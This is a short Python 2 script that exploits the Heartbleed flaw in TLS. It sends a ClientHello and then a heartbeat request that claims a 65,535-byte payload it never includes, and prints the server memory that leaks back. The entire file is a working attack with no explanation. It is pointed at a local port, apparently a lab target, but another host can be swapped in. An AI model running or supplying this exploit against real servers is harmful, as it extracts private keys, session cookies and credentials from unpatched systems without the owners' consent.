heartbleed_exploit.py

import socket
import time
    
CLIENT_HELLO = '''
16 03 02 00 31 # TLS Header
01 00 00 2d    # Handshake header
03 02          # ClientHello field: version number (TLS 1.1)
50 0b af bb b7
5a b8 3e f0 ab
9a e3 f3 9c 63
15 33 41 37 ac
fd 6c 18 1a 24
60 dc 49 67 c2
fd 96          # ClientHello field: random
00             # ClientHello field: session id
00 04          # ClientHello field: cipher suite length
00 33 c0 11    # ClientHello field: cipher suite(s)
01             # ClientHello field: compression support, length
00             # ClientHello field: compression support, no compression (0)
00 00          # ClientHello field: extension length (0)
'''
    
BAD_HB = '''
18    # Content type = 18 (Heartbeat message)
03 02 # Version
00 03 # Packet length
01    # Heartbeat message type (1 = request)
FF FF # Payload length
        # There is no actual message, just an empty string
'''
    
def no_comments(p):
    r = ''
    next_line = False
    for line in p.split('\n'):
        for hexbyte in line.split(' '):
            if len(hexbyte) == 0 or hexbyte[0] == '#':
                next_line = True
                break
            r += hexbyte.decode('hex')
        if next_line:
            continue
    return r
    
def recvall(s, timeout=3):
    s.setblocking(0)
    total_data = []
    data = ''
    begin = time.time()
    while True:
        if total_data and time.time() - begin > timeout:
            break
        elif time.time() - begin > timeout * 2:
            break
        try:
            data = s.recv(8192)
            if data:
                total_data.append(data)
                begin = time.time()
            else:
                time.sleep(0.1)
        except:
            pass
    return ''.join(total_data)
    
def attack(host, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    
    s.send(no_comments(CLIENT_HELLO))
    recvall(s)
    s.send(no_comments(BAD_HB))
    print recvall(s)
    
attack('127.0.0.1', 11443)